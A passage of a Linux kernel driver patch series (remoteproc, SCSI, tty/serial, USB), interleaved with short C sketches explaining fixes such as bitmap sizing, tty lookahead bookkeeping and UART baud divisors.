++			dev_err(dev, "%s: can not stop core 0 before core 1\n",
++				__func__);
++			ret = -EPERM;
++			goto out;
++		}
++
+ 		ret = k3_r5_core_halt(core);
+ 		if (ret)
+ 			goto out;
+@@ -1137,6 +1164,12 @@ static int k3_r5_rproc_configure_mode(struct k3_r5_rproc *kproc)
+ 		return ret;
+ 	}
+ 
++	/*
++	 * Skip the waiting mechanism for sequential power-on of cores if the
++	 * core has already been booted by another entity.
++	 */
++	core->released_from_reset = c_state;
++
+ 	ret = ti_sci_proc_get_status(core->tsp, &boot_vec, &cfg, &ctrl,
+ 				     &stat);
+ 	if (ret < 0) {
+@@ -1273,6 +1306,26 @@ static int k3_r5_cluster_rproc_init(struct platform_device *pdev)
+ 		if (cluster->mode == CLUSTER_MODE_LOCKSTEP ||
+ 		    cluster->mode == CLUSTER_MODE_SINGLECPU)
+ 			break;
++
++		/*
++		 * R5 cores must be powered on sequentially; within a
++		 * cluster, core0 should be in a higher power state than
++		 * core1. So wait for the current core to power up before
++		 * proceeding to the next core, with a 2 sec timeout each.
++		 *
++		 * This waiting mechanism is necessary because
++		 * rproc_auto_boot_callback() for core1 can be called before
++		 * core0 due to thread execution order.
++		 */
++		ret = wait_event_interruptible_timeout(cluster->core_transition,
++						       core->released_from_reset,
++						       msecs_to_jiffies(2000));
++		if (ret <= 0) {
++			dev_err(dev,
++				"Timed out waiting for %s core to power up!\n",
++				rproc->name);
++			return ret;
++		}
+ 	}
+ 
+ 	return 0;
+@@ -1708,6 +1761,7 @@ static int k3_r5_probe(struct platform_device *pdev)
+ 				CLUSTER_MODE_SPLIT : CLUSTER_MODE_LOCKSTEP;
+ 	cluster->soc_data = data;
+ 	INIT_LIST_HEAD(&cluster->cores);
++	init_waitqueue_head(&cluster->core_transition);
+ 
+ 	ret = of_property_read_u32(np, "ti,cluster-mode", &cluster->mode);
+ 	if (ret < 0 && ret != -EINVAL) {
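
The R5F change serializes bring-up with a wait queue: core1's init blocks, with a 2 s timeout, until core0's prepare path sets released_from_reset and wakes the queue. A rough pthread analogue of that handshake (illustrative only; the kernel uses wait_event_interruptible_timeout()):

    #include <pthread.h>
    #include <stdio.h>
    #include <time.h>

    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static pthread_cond_t  cond = PTHREAD_COND_INITIALIZER;
    static int core0_released;          /* released_from_reset */

    static void *core0_prepare(void *arg)
    {
            pthread_mutex_lock(&lock);
            core0_released = 1;             /* core 0 is out of reset  */
            pthread_cond_broadcast(&cond);  /* wake_up_interruptible() */
            pthread_mutex_unlock(&lock);
            return NULL;
    }

    int main(void)
    {
            pthread_t t;
            struct timespec to;

            clock_gettime(CLOCK_REALTIME, &to);
            to.tv_sec += 2;                 /* 2 s timeout, as in the patch */

            pthread_create(&t, NULL, core0_prepare, NULL);

            pthread_mutex_lock(&lock);      /* "core 1" waits here */
            while (!core0_released)
                    if (pthread_cond_timedwait(&cond, &lock, &to)) {
                            puts("timed out waiting for core0");
                            break;
                    }
            pthread_mutex_unlock(&lock);
            pthread_join(t, NULL);
            return !core0_released;
    }
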
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 42600e5c457a1..c77803bd9b009 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -1851,10 +1851,72 @@ persistent_id_show(struct device *dev, struct device_attribute *attr,
+ }
+ static DEVICE_ATTR_RO(persistent_id);
+ 
++/**
++ * sas_ncq_prio_supported_show - Indicate if device supports NCQ priority
++ * @dev: pointer to embedded device
++ * @attr: sas_ncq_prio_supported attribute descriptor
++ * @buf: the buffer returned
++ *
++ * A sysfs 'read-only' sdev attribute, only works with SATA devices
++ */
++static ssize_t
++sas_ncq_prio_supported_show(struct device *dev,
++			    struct device_attribute *attr, char *buf)
++{
++	struct scsi_device *sdev = to_scsi_device(dev);
++
++	return sysfs_emit(buf, "%d\n", sas_ata_ncq_prio_supported(sdev));
++}
++static DEVICE_ATTR_RO(sas_ncq_prio_supported);
++
++/**
++ * sas_ncq_prio_enable_show - Indicate if sending prioritized I/O commands is enabled
++ * @dev: pointer to embedded device
++ * @attr: sas_ncq_prio_enable attribute descriptor
++ * @buf: the buffer returned
++ *
++ * A sysfs 'read/write' sdev attribute, only works with SATA devices
++ */
++static ssize_t
++sas_ncq_prio_enable_show(struct device *dev,
++				 struct device_attribute *attr, char *buf)
++{
++	struct scsi_device *sdev = to_scsi_device(dev);
++	struct mpi3mr_sdev_priv_data *sdev_priv_data =  sdev->hostdata;
++
++	if (!sdev_priv_data)
++		return 0;
++
++	return sysfs_emit(buf, "%d\n", sdev_priv_data->ncq_prio_enable);
++}
++
++static ssize_t
++sas_ncq_prio_enable_store(struct device *dev,
++				  struct device_attribute *attr,
++				  const char *buf, size_t count)
++{
++	struct scsi_device *sdev = to_scsi_device(dev);
++	struct mpi3mr_sdev_priv_data *sdev_priv_data =  sdev->hostdata;
++	bool ncq_prio_enable = 0;
++
++	if (kstrtobool(buf, &ncq_prio_enable))
++		return -EINVAL;
++
++	if (!sas_ata_ncq_prio_supported(sdev))
++		return -EINVAL;
++
++	sdev_priv_data->ncq_prio_enable = ncq_prio_enable;
++
++	return strlen(buf);
++}
++static DEVICE_ATTR_RW(sas_ncq_prio_enable);
++
+ static struct attribute *mpi3mr_dev_attrs[] = {
+ 	&dev_attr_sas_address.attr,
+ 	&dev_attr_device_handle.attr,
+ 	&dev_attr_persistent_id.attr,
++	&dev_attr_sas_ncq_prio_supported.attr,
++	&dev_attr_sas_ncq_prio_enable.attr,
+ 	NULL,
+ };
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 8e6ac08e553bb..421a03dbbeb73 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -8497,6 +8497,12 @@ mpt3sas_base_attach(struct MPT3SAS_ADAPTER *ioc)
+ 	ioc->pd_handles_sz = (ioc->facts.MaxDevHandle / 8);
+ 	if (ioc->facts.MaxDevHandle % 8)
+ 		ioc->pd_handles_sz++;
++	/*
++	 * pd_handles_sz should have, at least, the minimal room for
++	 * set_bit()/test_bit(), otherwise an out-of-bounds access may occur.
++	 */
++	ioc->pd_handles_sz = ALIGN(ioc->pd_handles_sz, sizeof(unsigned long));
++
+ 	ioc->pd_handles = kzalloc(ioc->pd_handles_sz,
+ 	    GFP_KERNEL);
+ 	if (!ioc->pd_handles) {
+@@ -8514,6 +8520,13 @@ mpt3sas_base_attach(struct MPT3SAS_ADAPTER *ioc)
+ 	ioc->pend_os_device_add_sz = (ioc->facts.MaxDevHandle / 8);
+ 	if (ioc->facts.MaxDevHandle % 8)
+ 		ioc->pend_os_device_add_sz++;
++
++	/*
++	 * pend_os_device_add_sz should have, at least, the minimal room for
++	 * set_bit()/test_bit(), otherwise an out-of-bounds access may occur.
++	 */
++	ioc->pend_os_device_add_sz = ALIGN(ioc->pend_os_device_add_sz,
++					   sizeof(unsigned long));
+ 	ioc->pend_os_device_add = kzalloc(ioc->pend_os_device_add_sz,
+ 	    GFP_KERNEL);
+ 	if (!ioc->pend_os_device_add) {
+@@ -8805,6 +8818,12 @@ _base_check_ioc_facts_changes(struct MPT3SAS_ADAPTER *ioc)
+ 		if (ioc->facts.MaxDevHandle % 8)
+ 			pd_handles_sz++;
+ 
++		/*
++		 * pd_handles should have, at least, the minimal room for
++		 * set_bit()/test_bit(), otherwise an out-of-bounds access
++		 * may occur.
++		 */
++		pd_handles_sz = ALIGN(pd_handles_sz, sizeof(unsigned long));
+ 		pd_handles = krealloc(ioc->pd_handles, pd_handles_sz,
+ 		    GFP_KERNEL);
+ 		if (!pd_handles) {
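
The mpt3sas fix rounds the bitmap byte counts up to whole longs, because set_bit()/test_bit() always read and write a full unsigned long; a buffer sized to a bare MaxDevHandle/8 bytes can end mid-word. The arithmetic, for a hypothetical MaxDevHandle of 100 on an LP64 machine:

    #include <stdio.h>

    #define ALIGN(x, a) (((x) + (a) - 1) & ~((a) - 1))

    int main(void)
    {
            unsigned long max_dev_handle = 100;      /* hypothetical value */
            unsigned long sz = max_dev_handle / 8;   /* 12 bytes           */

            if (max_dev_handle % 8)
                    sz++;                            /* -> 13 bytes        */

            /* Round to whole longs so bit ops never touch past the end */
            sz = ALIGN(sz, sizeof(unsigned long));   /* -> 16 on LP64      */
            printf("pd_handles_sz = %lu\n", sz);
            return 0;
    }
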
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
+index 10055c7e4a9f7..eb00c091e29e0 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
+@@ -2045,9 +2045,6 @@ void
+ mpt3sas_setup_direct_io(struct MPT3SAS_ADAPTER *ioc, struct scsi_cmnd *scmd,
+ 	struct _raid_device *raid_device, Mpi25SCSIIORequest_t *mpi_request);
+ 
+-/* NCQ Prio Handling Check */
+-bool scsih_ncq_prio_supp(struct scsi_device *sdev);
+-
+ void mpt3sas_setup_debugfs(struct MPT3SAS_ADAPTER *ioc);
+ void mpt3sas_destroy_debugfs(struct MPT3SAS_ADAPTER *ioc);
+ void mpt3sas_init_debugfs(void);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_ctl.c b/drivers/scsi/mpt3sas/mpt3sas_ctl.c
+index 0d8b1e942deda..fc5af6a5114e3 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_ctl.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_ctl.c
+@@ -4034,7 +4034,7 @@ sas_ncq_prio_supported_show(struct device *dev,
+ {
+ 	struct scsi_device *sdev = to_scsi_device(dev);
+ 
+-	return sysfs_emit(buf, "%d\n", scsih_ncq_prio_supp(sdev));
++	return sysfs_emit(buf, "%d\n", sas_ata_ncq_prio_supported(sdev));
+ }
+ static DEVICE_ATTR_RO(sas_ncq_prio_supported);
+ 
+@@ -4069,7 +4069,7 @@ sas_ncq_prio_enable_store(struct device *dev,
+ 	if (kstrtobool(buf, &ncq_prio_enable))
+ 		return -EINVAL;
+ 
+-	if (!scsih_ncq_prio_supp(sdev))
++	if (!sas_ata_ncq_prio_supported(sdev))
+ 		return -EINVAL;
+ 
+ 	sas_device_priv_data->ncq_prio_enable = ncq_prio_enable;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+index 2ea3bdc638177..31768da482a57 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+@@ -12591,29 +12591,6 @@ scsih_pci_mmio_enabled(struct pci_dev *pdev)
+ 	return PCI_ERS_RESULT_RECOVERED;
+ }
+ 
+-/**
+- * scsih_ncq_prio_supp - Check for NCQ command priority support
+- * @sdev: scsi device struct
+- *
+- * This is called when a user indicates they would like to enable
+- * ncq command priorities. This works only on SATA devices.
+- */
+-bool scsih_ncq_prio_supp(struct scsi_device *sdev)
+-{
+-	struct scsi_vpd *vpd;
+-	bool ncq_prio_supp = false;
+-
+-	rcu_read_lock();
+-	vpd = rcu_dereference(sdev->vpd_pg89);
+-	if (!vpd || vpd->len < 214)
+-		goto out;
+-
+-	ncq_prio_supp = (vpd->data[213] >> 4) & 1;
+-out:
+-	rcu_read_unlock();
+-
+-	return ncq_prio_supp;
+-}
+ /*
+  * The pci device ids are defined in mpi/mpi2_cnfg.h.
+  */
+diff --git a/drivers/scsi/scsi_transport_sas.c b/drivers/scsi/scsi_transport_sas.c
+index 74b99f2b0b74a..6941d8cfb9ba5 100644
+--- a/drivers/scsi/scsi_transport_sas.c
++++ b/drivers/scsi/scsi_transport_sas.c
+@@ -416,6 +416,29 @@ unsigned int sas_is_tlr_enabled(struct scsi_device *sdev)
+ }
+ EXPORT_SYMBOL_GPL(sas_is_tlr_enabled);
+ 
++/**
++ * sas_ata_ncq_prio_supported - Check for ATA NCQ command priority support
++ * @sdev: SCSI device
++ *
++ * Check if an ATA device supports NCQ priority using VPD page 89h (ATA
++ * Information). Since this VPD page is implemented only for ATA devices,
++ * this function always returns false for SCSI devices.
++ */
++bool sas_ata_ncq_prio_supported(struct scsi_device *sdev)
++{
++	struct scsi_vpd *vpd;
++	bool ncq_prio_supported = false;
++
++	rcu_read_lock();
++	vpd = rcu_dereference(sdev->vpd_pg89);
++	if (vpd && vpd->len >= 214)
++		ncq_prio_supported = (vpd->data[213] >> 4) & 1;
++	rcu_read_unlock();
++
++	return ncq_prio_supported;
++}
++EXPORT_SYMBOL_GPL(sas_ata_ncq_prio_supported);
++
+ /*
+  * SAS Phy attributes
+  */
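
The check performed by the new sas_ata_ncq_prio_supported() helper is small enough to demonstrate standalone: VPD page 89h (ATA Information) must be at least 214 bytes long, and the NCQ priority flag is bit 4 of byte 213. A sketch of the same decoding against a raw page buffer (the buffer contents here are fabricated):

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Decode the NCQ priority flag from a raw VPD page 89h buffer, exactly
 * as the helper above does against sdev->vpd_pg89. */
static bool vpd89_ncq_prio_supported(const unsigned char *vpd, size_t len)
{
	if (vpd == NULL || len < 214)
		return false;
	return (vpd[213] >> 4) & 1;
}

int main(void)
{
	unsigned char vpd[256];		/* hypothetical page contents */

	memset(vpd, 0, sizeof(vpd));
	vpd[213] = 0x10;		/* set bit 4: priority supported */
	printf("%d\n", vpd89_ncq_prio_supported(vpd, sizeof(vpd)));
	return 0;
}
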
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 3ec9b324fdcf9..10df4ee01b3f2 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3288,16 +3288,23 @@ static bool sd_validate_opt_xfer_size(struct scsi_disk *sdkp,
+ 
+ static void sd_read_block_zero(struct scsi_disk *sdkp)
+ {
+-	unsigned int buf_len = sdkp->device->sector_size;
+-	char *buffer, cmd[10] = { };
++	struct scsi_device *sdev = sdkp->device;
++	unsigned int buf_len = sdev->sector_size;
++	u8 *buffer, cmd[16] = { };
+ 
+ 	buffer = kmalloc(buf_len, GFP_KERNEL);
+ 	if (!buffer)
+ 		return;
+ 
+-	cmd[0] = READ_10;
+-	put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
+-	put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
++	if (sdev->use_16_for_rw) {
++		cmd[0] = READ_16;
++		put_unaligned_be64(0, &cmd[2]); /* Logical block address 0 */
++		put_unaligned_be32(1, &cmd[10]);/* Transfer 1 logical block */
++	} else {
++		cmd[0] = READ_10;
++		put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
++		put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
++	}
+ 
+ 	scsi_execute_req(sdkp->device, cmd, DMA_FROM_DEVICE, buffer, buf_len,
+ 			 NULL, SD_TIMEOUT, sdkp->max_retries, NULL);
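
The sd.c change makes sd_read_block_zero() build a READ(16) CDB whenever the device requires 16-byte read/write commands (sdev->use_16_for_rw), since such devices (large-capacity or host-managed zoned disks, for instance) may reject READ(10). A standalone sketch of the two CDB layouts; byte offsets follow SBC, and the helper name is invented for illustration:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define READ_10 0x28
#define READ_16 0x88

/* Build a CDB that reads one logical block at LBA 0, mirroring the hunk
 * above: READ(16) carries a 64-bit LBA in bytes 2-9 and a 32-bit transfer
 * length in bytes 10-13; READ(10) uses bytes 2-5 and 7-8 respectively. */
static void build_read_block_zero(uint8_t cmd[16], int use_16_for_rw)
{
	memset(cmd, 0, 16);
	if (use_16_for_rw) {
		cmd[0] = READ_16;
		cmd[13] = 1;	/* big-endian 32-bit length = 1 */
	} else {
		cmd[0] = READ_10;
		cmd[8] = 1;	/* big-endian 16-bit length = 1 */
	}
}

int main(void)
{
	uint8_t cdb[16];

	build_read_block_zero(cdb, 1);
	printf("opcode 0x%02x, length byte %u\n", cdb[0], cdb[13]);
	return 0;
}
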
+diff --git a/drivers/spmi/hisi-spmi-controller.c b/drivers/spmi/hisi-spmi-controller.c
+index 5bd23262abd61..6f065159f3de3 100644
+--- a/drivers/spmi/hisi-spmi-controller.c
++++ b/drivers/spmi/hisi-spmi-controller.c
+@@ -303,7 +303,6 @@ static int spmi_controller_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&spmi_controller->lock);
+ 
+-	ctrl->nr = spmi_controller->channel;
+ 	ctrl->dev.parent = pdev->dev.parent;
+ 	ctrl->dev.of_node = of_node_get(pdev->dev.of_node);
+ 
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index f691bce5c1477..cbaaa9f776e52 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -927,8 +927,9 @@ static void margining_port_init(struct tb_port *port)
+ 	debugfs_create_file("run", 0600, dir, port, &margining_run_fops);
+ 	debugfs_create_file("results", 0600, dir, port, &margining_results_fops);
+ 	debugfs_create_file("test", 0600, dir, port, &margining_test_fops);
+-	if (independent_voltage_margins(usb4) ||
+-	    (supports_time(usb4) && independent_time_margins(usb4)))
++	if (independent_voltage_margins(usb4) == USB4_MARGIN_CAP_0_VOLTAGE_HL ||
++	    (supports_time(usb4) &&
++	     independent_time_margins(usb4) == USB4_MARGIN_CAP_1_TIME_LR))
+ 		debugfs_create_file("margin", 0600, dir, port, &margining_margin_fops);
+ }
+ 
+diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
+index 4dff2f34e2d06..3600cac105fa8 100644
+--- a/drivers/tty/n_tty.c
++++ b/drivers/tty/n_tty.c
+@@ -1602,15 +1602,25 @@ static void __receive_buf(struct tty_struct *tty, const unsigned char *cp,
+ 	else if (ldata->raw || (L_EXTPROC(tty) && !preops))
+ 		n_tty_receive_buf_raw(tty, cp, fp, count);
+ 	else if (tty->closing && !L_EXTPROC(tty)) {
+-		if (la_count > 0)
++		if (la_count > 0) {
+ 			n_tty_receive_buf_closing(tty, cp, fp, la_count, true);
+-		if (count > la_count)
+-			n_tty_receive_buf_closing(tty, cp, fp, count - la_count, false);
++			cp += la_count;
++			if (fp)
++				fp += la_count;
++			count -= la_count;
++		}
++		if (count > 0)
++			n_tty_receive_buf_closing(tty, cp, fp, count, false);
+ 	} else {
+-		if (la_count > 0)
++		if (la_count > 0) {
+ 			n_tty_receive_buf_standard(tty, cp, fp, la_count, true);
+-		if (count > la_count)
+-			n_tty_receive_buf_standard(tty, cp, fp, count - la_count, false);
++			cp += la_count;
++			if (fp)
++				fp += la_count;
++			count -= la_count;
++		}
++		if (count > 0)
++			n_tty_receive_buf_standard(tty, cp, fp, count, false);
+ 
+ 		flush_echoes(tty);
+ 		if (tty->ops->flush_chars)
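
The n_tty fix is pure pointer bookkeeping: once the lookahead span has been processed, cp and fp must be advanced past it (and count reduced) before the second pass runs, otherwise the leading bytes are processed twice. The pattern in isolation, with process() as a hypothetical stand-in for the two n_tty_receive_buf_* helpers:

#include <stddef.h>
#include <stdio.h>

/* Hypothetical stand-in for n_tty_receive_buf_standard()/_closing(). */
static void process(const unsigned char *cp, const char *fp,
		    size_t count, int lookahead_done)
{
	printf("process %zu bytes (lookahead_done=%d)\n", count, lookahead_done);
}

/* Consume the lookahead span once, then hand only the untouched tail to
 * the second pass -- the bug was passing the original cp/fp again. */
static void receive(const unsigned char *cp, const char *fp,
		    size_t count, size_t la_count)
{
	if (la_count > 0) {
		process(cp, fp, la_count, 1);
		cp += la_count;
		if (fp)
			fp += la_count;	/* the flag array runs parallel to cp */
		count -= la_count;
	}
	if (count > 0)
		process(cp, fp, count, 0);
}

int main(void)
{
	unsigned char buf[8] = "abcdefgh";

	receive(buf, NULL, sizeof(buf), 3);	/* 3 lookahead + 5 remaining */
	return 0;
}
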
+diff --git a/drivers/tty/serial/8250/8250_dw.c b/drivers/tty/serial/8250/8250_dw.c
+index 88035100b86c6..a1f2259cc9a98 100644
+--- a/drivers/tty/serial/8250/8250_dw.c
++++ b/drivers/tty/serial/8250/8250_dw.c
+@@ -523,7 +523,10 @@ static int dw8250_probe(struct platform_device *pdev)
+ 	if (!regs)
+ 		return dev_err_probe(dev, -EINVAL, "no registers defined\n");
+ 
+-	irq = platform_get_irq(pdev, 0);
++	irq = platform_get_irq_optional(pdev, 0);
++	/* no interrupt -> fall back to polling */
++	if (irq == -ENXIO)
++		irq = 0;
+ 	if (irq < 0)
+ 		return irq;
+ 
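
This probe path now treats a missing interrupt as non-fatal: platform_get_irq_optional() reports an absent IRQ resource as -ENXIO, and the 8250 core takes irq == 0 to mean "poll the port". A runnable sketch of just that mapping (normalize_irq() is an invented name standing in for the probe logic):

#include <stdio.h>
#include <errno.h>

/* Map "no IRQ resource" to polled operation; propagate real errors. */
static int normalize_irq(int ret)
{
	if (ret == -ENXIO)
		return 0;	/* no interrupt -> UART core polls */
	return ret;		/* valid IRQ, or e.g. -EPROBE_DEFER */
}

int main(void)
{
	printf("%d %d %d\n",
	       normalize_irq(42),	/* usable interrupt */
	       normalize_irq(-ENXIO),	/* absent -> poll */
	       normalize_irq(-EINVAL));	/* genuine failure propagates */
	return 0;
}
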
+diff --git a/drivers/tty/serial/8250/8250_pxa.c b/drivers/tty/serial/8250/8250_pxa.c
+index 795e55142d4c7..70a56062f791b 100644
+--- a/drivers/tty/serial/8250/8250_pxa.c
++++ b/drivers/tty/serial/8250/8250_pxa.c
+@@ -124,6 +124,7 @@ static int serial_pxa_probe(struct platform_device *pdev)
+ 	uart.port.regshift = 2;
+ 	uart.port.irq = irq;
+ 	uart.port.fifosize = 64;
++	uart.tx_loadsz = 32;
+ 	uart.port.flags = UPF_IOREMAP | UPF_SKIP_TEST | UPF_FIXED_TYPE;
+ 	uart.port.dev = &pdev->dev;
+ 	uart.port.uartclk = clk_get_rate(data->clk);
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index e6eedebf67765..a723df9b37dd9 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -482,16 +482,28 @@ static bool sc16is7xx_regmap_noinc(struct device *dev, unsigned int reg)
+ 	return reg == SC16IS7XX_RHR_REG;
+ }
+ 
++/*
++ * Configure programmable baud rate generator (divisor) according to the
++ * desired baud rate.
++ *
++ * From the datasheet, the divisor is computed according to:
++ *
++ *              XTAL1 input frequency
++ *             -----------------------
++ *                    prescaler
++ * divisor = ---------------------------
++ *            baud-rate x sampling-rate
++ */
+ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ {
+ 	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	u8 lcr;
+-	u8 prescaler = 0;
++	unsigned int prescaler = 1;
+ 	unsigned long clk = port->uartclk, div = clk / 16 / baud;
+ 
+-	if (div > 0xffff) {
+-		prescaler = SC16IS7XX_MCR_CLKSEL_BIT;
+-		div /= 4;
++	if (div >= BIT(16)) {
++		prescaler = 4;
++		div /= prescaler;
+ 	}
+ 
+ 	/* In an amazing feat of design, the Enhanced Features Register shares
+@@ -528,9 +540,10 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 
+ 	mutex_unlock(&one->efr_lock);
+ 
++	/* If bit MCR_CLKSEL is set, the divide-by-4 prescaler is activated. */
+ 	sc16is7xx_port_update(port, SC16IS7XX_MCR_REG,
+ 			      SC16IS7XX_MCR_CLKSEL_BIT,
+-			      prescaler);
++			      prescaler == 1 ? 0 : SC16IS7XX_MCR_CLKSEL_BIT);
+ 
+ 	/* Open the LCR divisors for configuration */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG,
+@@ -545,7 +558,7 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 	/* Put LCR back to the normal mode */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+ 
+-	return DIV_ROUND_CLOSEST(clk / 16, div);
++	return DIV_ROUND_CLOSEST((clk / prescaler) / 16, div);
+ }
+ 
+ static void sc16is7xx_handle_rx(struct uart_port *port, unsigned int rxlen,
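
The comment block added above gives the divisor formula; a worked example makes the prescaler path concrete. With a 14.7456 MHz XTAL1 and a deliberately slow 12 baud (both values hypothetical), the raw divisor 76800 overflows the 16-bit register, so the divide-by-4 prescaler kicks in and the programmed divisor becomes 19200, which reproduces the requested rate exactly:

#include <stdio.h>

int main(void)
{
	unsigned long clk = 14745600;	/* XTAL1 in Hz (hypothetical) */
	unsigned long baud = 12;	/* slow enough to force the prescaler */
	unsigned long prescaler = 1;
	unsigned long div = clk / 16 / baud;

	if (div >= (1UL << 16)) {	/* divisor register is 16 bits wide */
		prescaler = 4;
		div /= prescaler;
	}

	/* prescaler=4 divisor=19200 actual=12 baud */
	printf("prescaler=%lu divisor=%lu actual=%lu baud\n",
	       prescaler, div, (clk / prescaler) / 16 / div);
	return 0;
}
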
+diff --git a/drivers/usb/Makefile b/drivers/usb/Makefile
+index 643edf5fe18c6..80699e540caa9 100644
+--- a/drivers/usb/Makefile
++++ b/drivers/usb/Makefile
+@@ -34,6 +34,7 @@ obj-$(CONFIG_USB_R8A66597_HCD)	+= host/
+ obj-$(CONFIG_USB_FSL_USB2)	+= host/
+ obj-$(CONFIG_USB_FOTG210_HCD)	+= host/
+ obj-$(CONFIG_USB_MAX3421_HCD)	+= host/
++obj-$(CONFIG_USB_XEN_HCD)	+= host/
+ 
+ obj-$(CONFIG_USB_C67X00_HCD)	+= c67x00/
+ 
+diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
+index 1f0951be15ab7..eb0f5d7cc7563 100644
+--- a/drivers/usb/class/cdc-wdm.c
++++ b/drivers/usb/class/cdc-wdm.c
+@@ -266,14 +266,14 @@ static void wdm_int_callback(struct urb *urb)
+ 			dev_err(&desc->intf->dev, "Stall on int endpoint\n");
+ 			goto sw; /* halt is cleared in work */
+ 		default:
+-			dev_err(&desc->intf->dev,
++			dev_err_ratelimited(&desc->intf->dev,
+ 				"nonzero urb status received: %d\n", status);
+ 			break;
+ 		}
+ 	}
+ 
+ 	if (urb->actual_length < sizeof(struct usb_cdc_notification)) {
+-		dev_err(&desc->intf->dev, "wdm_int_callback - %d bytes\n",
++		dev_err_ratelimited(&desc->intf->dev, "wdm_int_callback - %d bytes\n",
+ 			urb->actual_length);
+ 		goto exit;
+ 	}
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index b2da74bb107af..698bf24ba44c7 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -830,9 +830,9 @@ static void ffs_user_copy_worker(struct work_struct *work)
+ {
+ 	struct ffs_io_data *io_data = container_of(work, struct ffs_io_data,
+ 						   work);
+-	int ret = io_data->req->status ? io_data->req->status :
+-					 io_data->req->actual;
++	int ret = io_data->status;
+ 	bool kiocb_has_eventfd = io_data->kiocb->ki_flags & IOCB_EVENTFD;
++	unsigned long flags;
+ 
+ 	if (io_data->read && ret > 0) {
+ 		kthread_use_mm(io_data->mm);
+@@ -845,7 +845,10 @@ static void ffs_user_copy_worker(struct work_struct *work)
+ 	if (io_data->ffs->ffs_eventfd && !kiocb_has_eventfd)
+ 		eventfd_signal(io_data->ffs->ffs_eventfd, 1);
+ 
++	spin_lock_irqsave(&io_data->ffs->eps_lock, flags);
+ 	usb_ep_free_request(io_data->ep, io_data->req);
++	io_data->req = NULL;
++	spin_unlock_irqrestore(&io_data->ffs->eps_lock, flags);
+ 
+ 	if (io_data->read)
+ 		kfree(io_data->to_free);
+@@ -861,6 +864,8 @@ static void ffs_epfile_async_io_complete(struct usb_ep *_ep,
+ 
+ 	ENTER();
+ 
++	io_data->status = req->status ? req->status : req->actual;
++
+ 	INIT_WORK(&io_data->work, ffs_user_copy_worker);
+ 	queue_work(ffs->io_completion_wq, &io_data->work);
+ }
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index e02ef31da68e4..f3a3a02ff820b 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -36,6 +36,7 @@
+ 
+ #define PCI_VENDOR_ID_ETRON		0x1b6f
+ #define PCI_DEVICE_ID_EJ168		0x7023
++#define PCI_DEVICE_ID_EJ188		0x7052
+ 
+ #define PCI_DEVICE_ID_INTEL_LYNXPOINT_XHCI	0x8c31
+ #define PCI_DEVICE_ID_INTEL_LYNXPOINT_LP_XHCI	0x9c31
+@@ -275,6 +276,12 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 		xhci->quirks |= XHCI_TRUST_TX_LENGTH;
+ 		xhci->quirks |= XHCI_BROKEN_STREAMS;
+ 	}
++	if (pdev->vendor == PCI_VENDOR_ID_ETRON &&
++			pdev->device == PCI_DEVICE_ID_EJ188) {
++		xhci->quirks |= XHCI_RESET_ON_RESUME;
++		xhci->quirks |= XHCI_BROKEN_STREAMS;
++	}
++
+ 	if (pdev->vendor == PCI_VENDOR_ID_RENESAS &&
+ 	    pdev->device == 0x0014) {
+ 		xhci->quirks |= XHCI_TRUST_TX_LENGTH;
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 4a039e42694bc..7549c430c4f01 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -987,13 +987,27 @@ static int xhci_invalidate_cancelled_tds(struct xhci_virt_ep *ep)
